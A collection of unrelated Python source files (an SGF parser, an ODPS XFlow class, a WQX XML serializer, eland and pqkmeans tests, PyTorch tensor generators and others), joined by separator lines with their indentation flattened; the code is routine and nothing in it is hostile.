browser.get("%s/org/office/%s/human_resource" % (config.url, org_id))
self.browser.find_element_by_id("show-add-btn").click()
self.browser.find_element_by_id("select_from_registry").click()
self.create("hrm_human_resource",
[
( "person_id",
"Beatriz de Carvalho",
"autocomplete")
]
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from .core import LazyLoad
from .. import serializers, utils
class XFlow(LazyLoad):
__slots__ = 'xml_source',
name = serializers.XMLNodeField('Name')
owner = serializers.XMLNodeField('Owner')
creation_time = serializers.XMLNodeField('CreationTime',
parse_callback=utils.parse_rfc822)
last_modified_time = serializers.XMLNodeField('LastModifiedTime',
parse_callback=utils.parse_rfc822)
def reload(self):
url = self.resource()
resp = self._client.get(url)
self.xml_source = resp.content
self.owner = resp.headers.get('x-odps-owner')
self.creation_time = utils.parse_rfc822(resp.headers.get('x-odps-creation-time'))
self.last_modified_time = utils.parse_rfc822(resp.headers.get('Last-Modified'))
def update(self):
return self._parent.update(self)
def drop(self):
return self._parent.delete(self)
|
### sgfparser.py parses .sgf files. Each parse takes a file and creates a list
### of ParsedNodes. The list of nodes may not adhere to normal game moves such
### as alternating colors, or starting with B in an even game and W with
### handicaps. The first node is the root node and should be game properties
### while following nodes should represent a game, but the nodes could
### represent setup for a problem.
###
import re
from System.IO import FileFormatException
class ParsedGame (object):
def __init__ (self):
## nodes is the only public member.
self.nodes = None
### __str__ produces a string that, when printed to a file, generates a valid
### .sgf file.
###
def __str__ (self):
if self.nodes is None:
return "" ## Min tree is "(;)", but that implies one empty node
else:
return "(" + self._nodes_string(self.nodes) + ")"
### _nodes_string returns a string for a series of nodes, and the caller
### needs to supply the open and close parens that bracket the series.
###
def _nodes_string (self, nodes):
res = ""
while nodes.next is not None:
## Get one node's string with a leading newline if it is not the
## first.
res += nodes.node_str(res != "")
if nodes.branches is not None:
for n in nodes.branches:
res = res + "\n(" + self._nodes_string(n) + ")"
return res
nodes = nodes.next
res += nodes.node_str(res != "") # Test res, could be single node branch.
return res
class ParsedNode (object):
def __init__ (self):
self.next = None
self.previous = None
self.branches = None
self.properties = {}
### node_str returns the string for one node, taking a flag for a
### preceding newline and the dictionary of properties for the node.
###
def node_str (self, newline):
props = self.properties
if newline:
s = "\n;"
else:
s = ";"
## Print move property first for readability of .sgf file by humans.
if "B" in props:
s = s + "B" + self._escaped_property_values("B", props["B"])
if "W" in props:
s = s + "W" + self._escaped_property_values("W", props["W"])
for k,v in props.iteritems():
if k == "B" or k == "W": continue
s = s + k + self._escaped_property_values(k, v)
return s
### _escaped_property_values returns a node's property value with escapes so that the .sgf
### is valid. So, ] and \ must be preceded by a backslash.
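### Example: the values ["a]b", "dd"] serialize to "[a\]b][dd]".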
###
def _escaped_property_values (self, id, values):
res = ""
for v in values:
res = res + "["
if "]" in v or "\\" in v:
tmp = []
for c in v:
if c == "]" or c == "\\":
tmp.append("\\")
tmp.append(c)
tmp.append("]")
res = res + "".join(tmp)
else:
res = res + v + "]"
return res
def parse_file (name):
f = open(name)
l = Lexer(f.read())
f.close()
l.scan_for("(", "Can't find game start")
g = ParsedGame()
g.nodes = _parse_nodes(l)
return g
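## Example usage (assumes "game.sgf" exists on disk):
##   game = parse_file("game.sgf")
##   print game.nodes.properties   # root node properties, e.g. {'SZ': ['19']}
##   print str(game)               # round-trips the tree back to .sgf text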
### _parse_nodes returns a linked list of ParseNodes. It starts scanning for a
### semi-colon for the start of the first node. If it encounters an open
### paren, it recurses and creates branches that follow the current node,
### making the next pointer of the current node point to the first node in the
### first branch.
###
def _parse_nodes (lexer):
lexer.scan_for(";", "Must be one node in each branch")
cur_node = _parse_node(lexer)
first = cur_node
branching_yet = False
while lexer.has_data():
## Semi-colon starts another node, open paren starts a branch, close
## paren stops list of nodes. Scanning raises an exception if one of
## these chars fails to follow (ignoring whitespace).
char = lexer.scan_for(";()")
if char == ";":
if branching_yet:
raise Exception("Found node after branching started.")
cur_node.next = _parse_node(lexer)
cur_node.next.previous = cur_node
cur_node = cur_node.next
elif char == "(":
if not branching_yet:
cur_node.next = _parse_nodes(lexer)
cur_node.next.previous = cur_node
cur_node.branches = [cur_node.next]
branching_yet = True
else:
n = _parse_nodes(lexer)
n.previous = cur_node
cur_node.branches.append(n)
elif char == ')':
return first
else:
raise FileFormatException("SGF file is malformed at char " + str(lexer.Location))
raise FileFormatException("Unexpectedly hit EOF!")
### _parse_node returns a ParseNode with its properties filled in.
###
def _parse_node (lexer):
node = ParsedNode()
## Loop properties ...
while lexer.has_data():
id = lexer.get_property_id()
if not id:
return node
if node.properties.has_key(id):
raise Exception("Encountered ID, %s, twice for node -- file location %s." %
(id, lexer.location))
lexer.scan_for("[", "Expected property value")
i = None
values = []
node.properties[id] = values
## Loop values for one property
while lexer.has_data():
## C and GC properties allow newline sequences in value.
values.append(lexer.get_property_value(id == "C" or id == "GC"))
## Must bind ignore due to Python's multi-value return model.
i, ignore = lexer.peek_for("[")
if i is None: break #no new values
lexer.set_location(i)
raise FileFormatException("Unexpectedly hit EOF!")
class Lexer (object):
def __init__ (self, contents):
self._data = contents
self._data_len = len(contents)
self._index = 0
self._put_token = None
### scan_for scans for any char in chars following whitespace. If
### non-whitespace intervenes, this is an error. Scan_for leaves _index
### after char and returns found char.
###
def scan_for (self, chars, errmsg = None):
i, c = self.peek_for(chars)
if i is None:
if errmsg:
errmsg = errmsg + " -- file location %s" % self._index
raise Exception(errmsg or "Expecting one of '%s' while scanning -- file location %s" % (chars, self._index))
else:
self._index = i
return c
### peek_for scans for any char in chars following whitespace. If
### non-whitespace intervenes, this is an error. Peek_for leaves _index
### unmodified.
###
def peek_for (self, chars):
i = self._index
while self.has_data():
c = self._data[i]
i += 1
if c in " \t\n\r\f\v":
continue
elif c in chars:
return (i, c)
else:
return (None, None)
return (None, None)
def has_data (self):
return self._index < self._data_len
def location (self):
return self._index
def set_location (self, i):
self._index = i
return i
_property_id_regexp = re.compile(r'\s*([A-Za-z]+)')
### "text" properties can have newlines, newlines following \ are removed
### along with \, other escaped chars are kept verbatim except whitespace
### is converted to space.
###
### "simpletext" is the same as "text" but has no newlines.
###
def get_property_id (self):
match = self._property_id_regexp.match(self._data, self._index)
if match:
self._index = match.end()
return match.group(1)
return None
### get_property_value takes a flag as to whether un-escaped newlines get
### mapped to space or kept as-is. It gobbles all the characters after a
### '[' (which has already been consumed) up to the next ']' and returns
### them as a string. Keep_newlines distinguishes properties like C and GC
### that can have newlines in their values, but otherwise, newlines are
### assumed to be purely line-length management in the .sgf file.
###
def get_property_value (self, keep_newlines):
res = []
while self.has_data():
c = self._data[self._index]
self._index += 1
if ord(c) < ord(' '): #if < space
## Map whitespace to spaces.
newline, c2 = self._check_property_newline(c)
if newline:
## Only map newline sequences according to keep_newlines.
if keep_newlines:
res.append(c)
if c2 is not None:
res.append(c2)
else:
res.append(" ")
else:
res.append(" ")
elif c == '\\':
## Backslash quotes chars and erases newlines.
c = self._data[self._index]
self._index += 1
newline, ignore = self._check_property_newline(c)
if newline:
res.append("")
else:
res.append(c)
elif c == "]":
return "".join(res)
else:
res.append(c)
raise FileFormatException("Unexpectedly hit EOF!")
### _check_property_newline check if c is part of a newline sequence. If
### it is, then see if there's a second newline sequence char and gobble
### it. Returns whether there was a newline sequence and what the second
### char was if it was part of the newline sequence.
###
def _check_property_newline (self, c):
if c == '\n' or c == '\r':
## Only map newline sequences according to keep_newlines.
c2 = self._data[self._index]
if c2 == '\n' or c2 == '\r':
self._index += 1
return (True, c2)
return (True, None)
else:
return (False, None)
|
#!/usr/bin/env python
"""
@file plot_caffe_ensemble_logloss.py
@brief plot caffe ensemble logloss (single vs ensemble)
@author ChenglongChen
"""
import sys
import numpy as np
from matplotlib import pyplot as plt
def main():
# collect command-line arguments
log_file_single = sys.argv[1]
log_file_ensemble = sys.argv[2]
if len(sys.argv) > 3:
pdf_file = sys.argv[3]
else:
pdf_file = sys.argv[1].split("caffemodel")[0] + "caffemodel_valid_logloss.pdf"
lines_single = open(log_file_single, "r").readlines()
logloss_single = [float(l[:-4]) for l in lines_single[1::2]]
logloss_single_mean = np.mean(logloss_single)
logloss_single_std = np.std(logloss_single)
lines_ensemble = open(log_file_ensemble, "r").readlines()
logloss_ensemble = [float(l[:-4]) for l in lines_ensemble[1::2]]
logloss_ensemble_min = np.min(logloss_ensemble)
# logloss
plt.plot(range(len(logloss_single)), logloss_single)
plt.plot(range(len(logloss_ensemble)), logloss_ensemble)
plt.plot(range(len(logloss_ensemble)), logloss_ensemble_min * np.ones((len(logloss_ensemble))))
plt.title("LogLoss vs Number of predictions")
plt.xlabel("Number of predictions")
plt.ylabel("LogLoss")
ls = "Single (Mean = %s, Std = %s)" % (np.round(logloss_single_mean,5), np.round(logloss_single_std,5))
le = "Ensemble (Min = %s)" % np.round(logloss_ensemble_min,5)
plt.legend([ls, le], loc="best")
plt.savefig(pdf_file)
print( "Save pdf figure to %s" % pdf_file )
if __name__ == "__main__":
main()
|
from typing import List, Union
from yattag import Doc
from ..exceptions import WQXException
from .BibliographicReference import BibliographicReference
from .SimpleContent import (
CellFormName,
CellShapeName,
FunctionalFeedingGroupName,
HabitName,
TaxonomicPollutionTolerance,
TaxonomicPollutionToleranceScaleText,
TrophicLevelName,
VoltinismName,
)
class TaxonomicDetails:
"""
This section allows for the further definition of user-defined details for taxa.
"""
__cellFormName: CellFormName
__cellShapeName: CellShapeName
__habitName: HabitName
__voltinismName: VoltinismName
__taxonomicPollutionTolerance: TaxonomicPollutionTolerance
__taxonomicPollutionToleranceScaleText: TaxonomicPollutionToleranceScaleText
__trophicLevelName: TrophicLevelName
__functionalFeedingGroupName: FunctionalFeedingGroupName
__taxonomicDetailsCitation: BibliographicReference
def __init__(
self,
o: dict = None,
*,
cellFormName: CellFormName = None,
cellShapeName: CellShapeName = None,
habitName: HabitName = None,
voltinismName: VoltinismName = None,
taxonomicPollutionTolerance: TaxonomicPollutionTolerance = None,
taxonomicPollutionToleranceScaleText: TaxonomicPollutionToleranceScaleText = None,
trophicLevelName: TrophicLevelName = None,
functionalFeedingGroupName: FunctionalFeedingGroupName = None,
taxonomicDetailsCitation: BibliographicReference = None
):
if isinstance(o, TaxonomicDetails):
# Assign attributes from objects without typechecking
self.__cellFormName = o.cellFormName
self.__cellShapeName = o.cellShapeName
self.__habitName = o.habitName
self.__voltinismName = o.voltinismName
self.__taxonomicPollutionTolerance = o.taxonomicPollutionTolerance
self.__taxonomicPollutionToleranceScaleText = (
o.taxonomicPollutionToleranceScaleText
)
self.__trophicLevelName = o.trophicLevelName
self.__functionalFeedingGroupName = o.functionalFeedingGroupName
self.__taxonomicDetailsCitation = o.taxonomicDetailsCitation
elif isinstance(o, dict):
# Assign attributes from dictionary with typechecking
self.cellFormName = o.get("cellFormName")
self.cellShapeName = o.get("cellShapeName")
self.habitName = o.get("habitName")
self.voltinismName = o.get("voltinismName")
self.taxonomicPollutionTolerance = o.get("taxonomicPollutionTolerance")
self.taxonomicPollutionToleranceScaleText = o.get(
"taxonomicPollutionToleranceScaleText"
)
self.trophicLevelName = o.get("trophicLevelName")
self.functionalFeedingGroupName = o.get("functionalFeedingGroupName")
self.taxonomicDetailsCitation = o.get("taxonomicDetailsCitation")
else:
# Assign attributes from named keywords with typechecking
self.cellFormName = cellFormName
self.cellShapeName = cellShapeName
self.habitName = habitName
self.voltinismName = voltinismName
self.taxonomicPollutionTolerance = taxonomicPollutionTolerance
self.taxonomicPollutionToleranceScaleText = (
taxonomicPollutionToleranceScaleText
)
self.trophicLevelName = trophicLevelName
self.functionalFeedingGroupName = functionalFeedingGroupName
self.taxonomicDetailsCitation = taxonomicDetailsCitation
@property
def cellFormName(self) -> CellFormName:
return self.__cellFormName
@cellFormName.setter
def cellFormName(self, val: CellFormName) -> None:
self.__cellFormName = None if val is None else CellFormName(val)
@property
def cellShapeName(self) -> CellShapeName:
return self.__cellShapeName
@cellShapeName.setter
def cellShapeName(self, val: CellShapeName) -> None:
self.__cellShapeName = None if val is None else CellShapeName(val)
@property
def habitName(self) -> HabitName:
return self.__habitName
@habitName.setter
def habitName(self, val: Union[HabitName, List[HabitName]]) -> None:
if val is None:
self.__habitName = []
elif isinstance(val, list):
r: List[HabitName] = []
for x in val:
r.append(HabitName(x))
self.__habitName = r
else:
self.__habitName = [HabitName(val)]
@property
def voltinismName(self) -> VoltinismName:
return self.__voltinismName
@voltinismName.setter
def voltinismName(self, val: VoltinismName) -> None:
self.__voltinismName = None if val is None else VoltinismName(val)
@property
def taxonomicPollutionTolerance(self) -> TaxonomicPollutionTolerance:
return self.__taxonomicPollutionTolerance
@taxonomicPollutionTolerance.setter
def taxonomicPollutionTolerance(self, val: TaxonomicPollutionTolerance) -> None:
self.__taxonomicPollutionTolerance = (
None if val is None else TaxonomicPollutionTolerance(val)
)
@property
def taxonomicPollutionToleranceScaleText(
self,
) -> TaxonomicPollutionToleranceScaleText:
return self.__taxonomicPollutionToleranceScaleText
@taxonomicPollutionToleranceScaleText.setter
def taxonomicPollutionToleranceScaleText(
self, val: TaxonomicPollutionToleranceScaleText
) -> None:
self.__taxonomicPollutionToleranceScaleText = (
None if val is None else TaxonomicPollutionToleranceScaleText(val)
)
@property
def trophicLevelName(self) -> TrophicLevelName:
return self.__trophicLevelName
@trophicLevelName.setter
def trophicLevelName(self, val: TrophicLevelName) -> None:
self.__trophicLevelName = None if val is None else TrophicLevelName(val)
@property
def functionalFeedingGroupName(self) -> FunctionalFeedingGroupName:
return self.__functionalFeedingGroupName
@functionalFeedingGroupName.setter
def functionalFeedingGroupName(
self, val: Union[FunctionalFeedingGroupName, List[FunctionalFeedingGroupName]]
) -> None:
if val is None:
self.__functionalFeedingGroupName = []
elif isinstance(val, list):
r: List[FunctionalFeedingGroupName] = []
for x in val:
r.append(FunctionalFeedingGroupName(x))
self.__functionalFeedingGroupName = r
else:
self.__functionalFeedingGroupName = [FunctionalFeedingGroupName(val)]
@property
def taxonomicDetailsCitation(self) -> BibliographicReference:
return self.__taxonomicDetailsCitation
@taxonomicDetailsCitation.setter
def taxonomicDetailsCitation(self, val: BibliographicReference) -> None:
self.__taxonomicDetailsCitation = (
None if val is None else BibliographicReference(val)
)
def generateXML(self, name: str = "TaxonomicDetails") -> str: # noqa: C901
doc = Doc()
asis = doc.asis
line = doc.line
tag = doc.tag
with tag(name):
if self.__cellFormName is not None:
line("CellFormName", self.__cellFormName)
if self.__cellShapeName is not None:
line("CellShapeName", self.__cellShapeName)
if len(self.__habitName) > 3:
raise WQXException(
"Attribute 'habitName' must be a list of 0 to 3 HabitName objects."
)
for x in self.__habitName:
line("HabitName", x)
if self.__voltinismName is not None:
line("VoltinismName", self.__voltinismName)
if self.__taxonomicPollutionTolerance is not None:
line("TaxonomicPollutionTolerance", self.__taxonomicPollutionTolerance)
if self.__taxonomicPollutionToleranceScaleText is not None:
line(
"TaxonomicPollutionToleranceScaleText",
self.__taxonomicPollutionToleranceScaleText,
)
if self.__trophicLevelName is not None:
line("TrophicLevelName", self.__trophicLevelName)
if len(self.__functionalFeedingGroupName) > 3:
raise WQXException(
"Attribute 'functionalFeedingGroupName' must be a list of 0 to 3 "
"FunctionalFeedingGroupName objects."
)
for x in self.__functionalFeedingGroupName:
line("FunctionalFeedingGroupName", x)
if self.__taxonomicDetailsCitation is not None:
asis(
self.__taxonomicDetailsCitation.generateXML(
"TaxonomicDetailsCitation"
)
)
return doc.getvalue()
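# Illustrative usage sketch (not part of the original module). The exact
# constructor signature and the valid domain values are assumptions; WQX fields
# must come from the corresponding EPA domain value lists.
#
#   details = TaxonomicDetails(trophicLevelName="Herbivore", habitName=None, ...)
#   print(details.generateXML())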
|
"""
General-purpose components useful in all viewdom_wired apps.
"""
from dataclasses import dataclass
from viewdom import VDOM
@dataclass
class Super:
parent_children: VDOM = ()
def __call__(self) -> VDOM:
return self.parent_children
|
import sys
import os
import shutil
import setuptools
if sys.argv[-1] == "publish":
# if os.system("pip freeze | grep wheel"):
# print("wheel not installed.\nUse `pip install wheel`.\nExiting.")
# sys.exit()
if os.system("pip freeze | grep twine"):
print("twine not installed.\nUse `pip install twine`.\nExiting.")
sys.exit()
os.system("python setup.py sdist bdist_wheel")
os.system("twine upload dist/*")
shutil.rmtree("dist")
shutil.rmtree("build")
# shutil.rmtree("djangorestframework.egg-info")
sys.exit()
setuptools.setup()
|
# Copyright 2019 Elasticsearch BV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# File called _pytest for PyCharm compatibility
import pandas as pd
import pytest
from eland.dataframe import DEFAULT_NUM_ROWS_DISPLAYED
from eland.tests.common import TestData, assert_pandas_eland_series_equal
class TestDataFrameRepr(TestData):
@classmethod
def setup_class(cls):
# conftest.py changes this default - restore to original setting
pd.set_option("display.max_rows", 60)
"""
to_string
"""
def test_simple_lat_lon(self):
"""
        Note on nested object order - this can change depending on how `_source`
        is requested; note this could be a bug in ES...
PUT my_index/doc/1
{
"location": {
"lat": "50.033333",
"lon": "8.570556"
}
}
GET my_index/_search
"_source": {
"location": {
"lat": "50.033333",
"lon": "8.570556"
}
}
GET my_index/_search
{
"_source": "location"
}
"_source": {
"location": {
"lon": "8.570556",
"lat": "50.033333"
}
}
Hence we store the pandas df source json as 'lon', 'lat'
"""
pd_dest_location = self.pd_flights()["DestLocation"].head(1)
ed_dest_location = self.ed_flights()["DestLocation"].head(1)
assert_pandas_eland_series_equal(pd_dest_location, ed_dest_location)
def test_num_rows_to_string(self):
# check setup works
assert pd.get_option("display.max_rows") == 60
# Test eland.DataFrame.to_string vs pandas.DataFrame.to_string
# In pandas calling 'to_string' without max_rows set, will dump ALL rows
# Test n-1, n, n+1 for edge cases
self.num_rows_to_string(DEFAULT_NUM_ROWS_DISPLAYED - 1)
self.num_rows_to_string(DEFAULT_NUM_ROWS_DISPLAYED)
with pytest.warns(UserWarning):
# UserWarning displayed by eland here (compare to pandas with max_rows set)
self.num_rows_to_string(
DEFAULT_NUM_ROWS_DISPLAYED + 1, None, DEFAULT_NUM_ROWS_DISPLAYED
)
# Test for where max_rows lt or gt num_rows
self.num_rows_to_string(10, 5, 5)
self.num_rows_to_string(100, 200, 200)
def num_rows_to_string(self, rows, max_rows_eland=None, max_rows_pandas=None):
ed_flights = self.ed_flights()[["DestLocation", "OriginLocation"]]
pd_flights = self.pd_flights()[["DestLocation", "OriginLocation"]]
ed_head = ed_flights.head(rows)
pd_head = pd_flights.head(rows)
ed_head_str = ed_head.to_string(max_rows=max_rows_eland)
pd_head_str = pd_head.to_string(max_rows=max_rows_pandas)
# print("\n", ed_head_str)
# print("\n", pd_head_str)
assert pd_head_str == ed_head_str
def test_empty_dataframe_string(self):
ed_ecom = self.ed_ecommerce()
pd_ecom = self.pd_ecommerce()
ed_ecom_s = ed_ecom[ed_ecom["currency"] == "USD"].to_string()
pd_ecom_s = pd_ecom[pd_ecom["currency"] == "USD"].to_string()
assert ed_ecom_s == pd_ecom_s
"""
repr
"""
def test_num_rows_repr(self):
self.num_rows_repr(
pd.get_option("display.max_rows") - 1, pd.get_option("display.max_rows") - 1
)
self.num_rows_repr(
pd.get_option("display.max_rows"), pd.get_option("display.max_rows")
)
self.num_rows_repr(
pd.get_option("display.max_rows") + 1, pd.get_option("display.min_rows")
)
def num_rows_repr(self, rows, num_rows_printed):
ed_flights = self.ed_flights()
pd_flights = self.pd_flights()
ed_head = ed_flights.head(rows)
pd_head = pd_flights.head(rows)
ed_head_str = repr(ed_head)
pd_head_str = repr(pd_head)
if num_rows_printed < rows:
# add 1 for ellipsis
num_rows_printed = num_rows_printed + 1
# number of rows is num_rows_printed + 3 (header, summary)
assert (num_rows_printed + 3) == len(ed_head_str.splitlines())
assert pd_head_str == ed_head_str
def test_empty_dataframe_repr(self):
ed_ecom = self.ed_ecommerce()
pd_ecom = self.pd_ecommerce()
ed_ecom_r = repr(ed_ecom[ed_ecom["currency"] == "USD"])
pd_ecom_r = repr(pd_ecom[pd_ecom["currency"] == "USD"])
assert ed_ecom_r == pd_ecom_r
"""
to_html
"""
def test_num_rows_to_html(self):
# check setup works
assert pd.get_option("display.max_rows") == 60
# Test eland.DataFrame.to_string vs pandas.DataFrame.to_string
# In pandas calling 'to_string' without max_rows set, will dump ALL rows
# Test n-1, n, n+1 for edge cases
self.num_rows_to_html(DEFAULT_NUM_ROWS_DISPLAYED - 1)
self.num_rows_to_html(DEFAULT_NUM_ROWS_DISPLAYED)
with pytest.warns(UserWarning):
# UserWarning displayed by eland here
self.num_rows_to_html(
DEFAULT_NUM_ROWS_DISPLAYED + 1, None, DEFAULT_NUM_ROWS_DISPLAYED
)
# Test for where max_rows lt or gt num_rows
self.num_rows_to_html(10, 5, 5)
self.num_rows_to_html(100, 200, 200)
def num_rows_to_html(self, rows, max_rows_eland=None, max_rows_pandas=None):
ed_flights = self.ed_flights()
pd_flights = self.pd_flights()
ed_head = ed_flights.head(rows)
pd_head = pd_flights.head(rows)
ed_head_str = ed_head.to_html(max_rows=max_rows_eland)
pd_head_str = pd_head.to_html(max_rows=max_rows_pandas)
# print(ed_head_str)
# print(pd_head_str)
assert pd_head_str == ed_head_str
def test_empty_dataframe_to_html(self):
ed_ecom = self.ed_ecommerce()
pd_ecom = self.pd_ecommerce()
ed_ecom_h = ed_ecom[ed_ecom["currency"] == "USD"].to_html()
pd_ecom_h = pd_ecom[pd_ecom["currency"] == "USD"].to_html()
assert ed_ecom_h == pd_ecom_h
"""
_repr_html_
"""
def test_num_rows_repr_html(self):
# check setup works
assert pd.get_option("display.max_rows") == 60
show_dimensions = pd.get_option("display.show_dimensions")
# TODO - there is a bug in 'show_dimensions' as it gets added after the last </div>
# For now test without this
pd.set_option("display.show_dimensions", False)
# Test eland.DataFrame.to_string vs pandas.DataFrame.to_string
# In pandas calling 'to_string' without max_rows set, will dump ALL rows
# Test n-1, n, n+1 for edge cases
self.num_rows_repr_html(pd.get_option("display.max_rows") - 1)
self.num_rows_repr_html(pd.get_option("display.max_rows"))
self.num_rows_repr_html(
pd.get_option("display.max_rows") + 1, pd.get_option("display.max_rows")
)
# Restore default
pd.set_option("display.show_dimensions", show_dimensions)
def num_rows_repr_html(self, rows, max_rows=None):
ed_flights = self.ed_flights()
pd_flights = self.pd_flights()
ed_head = ed_flights.head(rows)
pd_head = pd_flights.head(rows)
ed_head_str = ed_head._repr_html_()
pd_head_str = pd_head._repr_html_()
# print(ed_head_str)
# print(pd_head_str)
assert pd_head_str == ed_head_str
def test_empty_dataframe_repr_html(self):
# TODO - there is a bug in 'show_dimensions' as it gets added after the last </div>
# For now test without this
show_dimensions = pd.get_option("display.show_dimensions")
pd.set_option("display.show_dimensions", False)
ed_ecom = self.ed_ecommerce()
pd_ecom = self.pd_ecommerce()
ed_ecom_rh = ed_ecom[ed_ecom["currency"] == "USD"]._repr_html_()
pd_ecom_rh = pd_ecom[pd_ecom["currency"] == "USD"]._repr_html_()
# Restore default
pd.set_option("display.show_dimensions", show_dimensions)
assert ed_ecom_rh == pd_ecom_rh
|
#
# create_tensors.py
#
# Author(s):
# Matteo Spallanzani <spmatteo@iis.ee.ethz.ch>
#
# Copyright (c) 2020-2021 ETH Zurich.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from enum import IntEnum
from collections import namedtuple
import torch
from typing import Tuple
from typing import Union
class BatchSize(IntEnum):
SINGLE = 2 ** 0
SMALL = 2 ** 4
LARGE = 2 ** 8
class InputSize(IntEnum):
SMALL = 0
NORMAL = 1
LARGE = 2
class LinearSize(IntEnum):
SMALL = 2 ** 6
NORMAL = 2 ** 9
LARGE = 2 ** 12
class Conv2dChannels(IntEnum):
SMALL = 2 ** 6
NORMAL = 2 ** 8
LARGE = 2 ** 10
class Conv2dSpatialSize(IntEnum):
SMALL = 2 ** 5 # CIFAR-10
NORMAL = 2 ** 7 # ~ ImageNet / 2
LARGE = 2 ** 9 # ~ ImageNet * 2
class Kind(IntEnum):
ZEROS = 0
ONES = 1
RANDN = 2
LINSPACE = 3
Range = namedtuple('Range', ['start', 'end'])
class TensorGenerator(object):
def __init__(self,
device: torch.device,
kind: Kind,
range_: Union[Range, None] = None):
self._device = device
self._kind = kind
self._range = range_
@property
def size(self):
raise NotImplementedError
def __next__(self) -> torch.Tensor:
if self._kind == Kind.ZEROS:
x = torch.zeros(*self.size)
elif self._kind == Kind.ONES:
x = torch.ones(*self.size)
elif self._kind == Kind.RANDN:
x = torch.randn(*self.size)
elif self._kind == Kind.LINSPACE:
assert self._range is not None
from functools import reduce
n = reduce(lambda x, y: x * y, self.size)
x = torch.linspace(self._range.start, self._range.end, n).reshape(*self.size) # x.view(-1) returns the linearly spaced values in a one-dimensional array
else:
raise ValueError
return x.to(device=self._device)
class LinearTensorGenerator(TensorGenerator):
def __init__(self,
device: torch.device,
batch_size: int,
n_channels: int,
kind: Kind,
range_: Union[Range, None] = None):
super(LinearTensorGenerator, self).__init__(device, kind, range_)
self._batch_size = batch_size
self._n_channels = n_channels
@property
def size(self) -> Tuple[int, int]:
return self._batch_size, self._n_channels
class Conv2dTensorGenerator(TensorGenerator):
def __init__(self,
device: torch.device,
batch_size: int,
n_channels: int,
                 spatial_size: int,  # I assume square images, so one integer is sufficient
kind: Kind,
range_: Union[Range, None] = None):
super(Conv2dTensorGenerator, self).__init__(device, kind, range_)
self._batch_size = batch_size
self._n_channels = n_channels
self._spatial_size = spatial_size
@property
def size(self) -> Tuple[int, int, int, int]:
return self._batch_size, self._n_channels, self._spatial_size, self._spatial_size
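if __name__ == "__main__":
    # Illustrative usage sketch (not part of the original file): draw one small
    # batch of linearly spaced values on the CPU and check its shape.
    gen = LinearTensorGenerator(torch.device('cpu'), BatchSize.SMALL,
                                LinearSize.SMALL, Kind.LINSPACE,
                                Range(0.0, 1.0))
    x = next(gen)
    assert x.size() == (int(BatchSize.SMALL), int(LinearSize.SMALL))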
|
import unittest
import pqkmeans
import numpy
import pipe
class TestPQEncoder(unittest.TestCase):
def data_source(self, n: int):
for i in range(n):
for _ in range(3):
yield [i * 100] * 6
def setUp(self):
self.encoder = pqkmeans.encoder.PQEncoder(num_subdim=2)
def test_just_train_array(self):
input_array = numpy.random.random((300, 10))
self.encoder.fit(numpy.array(input_array))
encoded = list(self.encoder.transform(numpy.array(input_array)))
self.assertEqual(len(input_array), len(encoded))
def test_fit_and_transform_generator(self):
self.encoder.fit(numpy.array(list(self.data_source(300))))
# infinite list
encoded = self.encoder.transform_generator(self.data_source(100000000)) | pipe.take(60) | pipe.as_list
for i in range(0, len(encoded), 3):
numpy.testing.assert_array_almost_equal(encoded[i], encoded[i + 1])
numpy.testing.assert_array_almost_equal(encoded[i], encoded[i + 2])
def test_transform_and_inverse_transform(self):
input_array = numpy.random.random((300, 10))
self.encoder.fit(numpy.array(input_array))
encoded = self.encoder.transform(numpy.array(input_array))
decoded = self.encoder.inverse_transform(encoded)
N1, M = encoded.shape
N2, D = decoded.shape
self.assertEqual(N1, N2)
self.assertEqual(M, self.encoder.M)
self.assertEqual(D, self.encoder.Ds * self.encoder.M)
self.assertEqual(encoded.dtype, self.encoder.code_dtype)
|
from .connection import MysqlConnection
from .queryRunner import MysqlQueryRunner
from .queryBuilder import MysqlQueryBuilder
from .tableBuilder import MysqlTableBuilder
|
import attr
import logging
from functools import reduce
from typing import List, Dict, Union, Tuple, Optional
import jstruct.utils as utils
logger = logging.getLogger(__name__)
REQUIRED = True
struct = attr.s(auto_attribs=True)
class _JStruct:
"""A typing definition wrapper used to defined nested struct.
@struct
class Child:
child_prop1: int
@struct
class Parent:
parent_prop: str
child: Child = JStruct[Child]
"""
def __getitem__(
self, arguments: Union[type, Tuple[type, Optional[bool], Optional[dict]]]
):
"""Override the `[]` operator to offer a typing wrapper syntactic sugar.
:arguments is either a `type` or a `tuple`
- type: the nested struct type (or class)
- tuple: ( type, REQUIRED, {dictionary of extra attr.ib arguments} )
:return a property initializer from attrs (attr.ib)
"""
class_, required_, *kwargs = (
arguments if isinstance(arguments, tuple) else (arguments, False)
)
def converter(args) -> class_:
return utils.instantiate(class_, args) if isinstance(args, dict) else args
default_ = dict(default=attr.NOTHING if required_ else None)
return attr.ib(**{
**default_,
"converter": converter,
**dict(reduce(lambda r, d: r + list(d.items()), kwargs, []))
})
class _JList:
"""A typing definition wrapper used to defined nested collection (list) of struct.
@struct
class Child:
child_prop1: int
@struct
class Parent:
parent_prop: str
children: List[Child] = JList[Child]
"""
def __getitem__(
self, arguments: Union[type, Tuple[type, Optional[bool], Optional[dict]]]
):
"""Override the `[]` operator to offer a typing wrapper syntactic sugar.
:arguments is either a `type` or a `tuple`
